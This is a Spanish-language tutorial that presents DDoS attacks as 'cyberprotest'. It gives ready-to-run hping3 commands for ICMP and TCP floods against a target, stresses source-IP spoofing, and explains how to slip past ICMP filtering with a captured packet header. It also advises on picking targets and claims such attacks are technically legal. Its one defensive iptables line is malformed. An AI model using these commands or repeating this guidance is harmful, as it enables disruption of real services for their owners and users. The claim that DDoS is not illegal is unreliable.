Ciberprotesta con hping3
Introducción
La ciberprotesta pasa por dos tipos de ataques: el Deface y el DDoS. El primero requiere de conocimientos avanzados, así que no constituye un metodo muy extendido. El segundo en cambio es realmente fácil de hacer y cuenta con una herramienta grafica para windows llamada LOIC. Desafortunadamente después de haber sido utilizada para atacar sitios de Visa y Mastercard, ha sido catalogada como malware por los antivirus, así que muchos prefieren evitarla, aunque LOIC definitivamente no es un virus ni tiene nada que pueda afectar tu equipo.
¿Pero que es un ataque DDoS?
Básicamente consiste en hacer uso intensivo de un servicio hasta que este colapse por incapacidad de atender tantas respuestas. En la practica se ataca un sitio web para que deje de estar disponible. Técnicamente no se trata de algo ilegal, pues simplemente se está haciendo uso de un servicio publico, aunque en algunos países si puede serlo. Aun así el costo de rastrear cada una de las ip de los atacantes es mucho mayor al beneficio de anunciar su detención por los medios, lo cual sólo beneficiaría la causa que los atacantes defienden al hacerla publica.
Esto hace que este tipo de protestas sean las más populares hoy en día. Para que un buen ataque DDoS tenga el impacto deseado es necesario anunciarlo y publicarlo en todos los medios posibles. También es deseable elegir un objetivo importante pero que no genere la reacción adversa en la opinión publica. Así, por ejemplo es preferible evitar el ataque a medios de comunicación, ya que estaríamos atacando el derecho a la libre expresión.
Instalación de hpin3
Si usas Linux en tu equipo puedes hacer un buen ataque DDoS sin necesidad de utilizar el programa LOIC. Para ello solo necesitas instalar hping3 disponible para todas las distribuciones.
Para instalarla en Ubuntu/Debian usa:
sudo apt-get install hping3
Cómo usarlo
Es posible reducir el ancho de banda disponible de un host utilizando lo que se conoce como ICMP flooding. Esto es una inundacion de mensajes ICMP. ICMP es el protocolo de mensajes de control de internet y se utiliza normalmente para verificar el estado de la red.
Nota: Antiguamente era posible comprometer el acceso de una maquina con el llamado "ping de la muerte" pero hoy en día esa tecnica está obsoleta.
Ejemplo de ICMP flooding:
hping3 -q -n -a xxx.xxx.xxx.xxx --id 0 --icmp -d56 --flood yyy.yyy.yyy.yyy
Explicación
-a : direccion ip falsa MUY IMPORTANTE!! --flood: direccion ip del objetivo. -q : modo silencioso -n : sin resolucion dns --id 0 : solicitud de echo (ping) -d : el tamaño del paquete (el tamaño normal es 56)
Nota: Algunas configuraciones de sistema automáticamente descartan los paquetes ICMP generados por hping3. Estos son reconocidos por su encabezado. Para evitar este bloqueo es posible usar un snifer como wireshark y capturar algo de trafico icmp real con el fin de obtener un encabezado válido de un paquete ICMP echo request. Una vez capturado lo guardamos como archivo binario y lo usamos con hping3 de la siguiente manera:
hping3 -q -n --rawip -a xxx.xxx.xxx.xxx --ipproto 1 --file "./icmp_echo_request.bin" -d 64 --flood yyy.yyy.yyy.yyy
Defensa
En caso de que te veas atacado y tengas iptables, una medida rapida es ejecutar el siguiente comando:
iptables -p icmp -j DROP
Con esto bloqueas todo el trafico icmp.
Ataques TCP
También es posible realizar ataques TCP
hping3 -q -n -a xxx.xxx.xxx.xxx -SARFU -p 80 --flood yyy.yyy.yyy.yyy
En este ejemplo el ataque es contra un servidor web (-SARFU son las distintas banderas tcp que estamos usando en el ataque)
Conclusión
hping3 es una heramienta potente y muy versatil, para ver todas sus opciones puedes consultar las paginas del manual:
man hping3
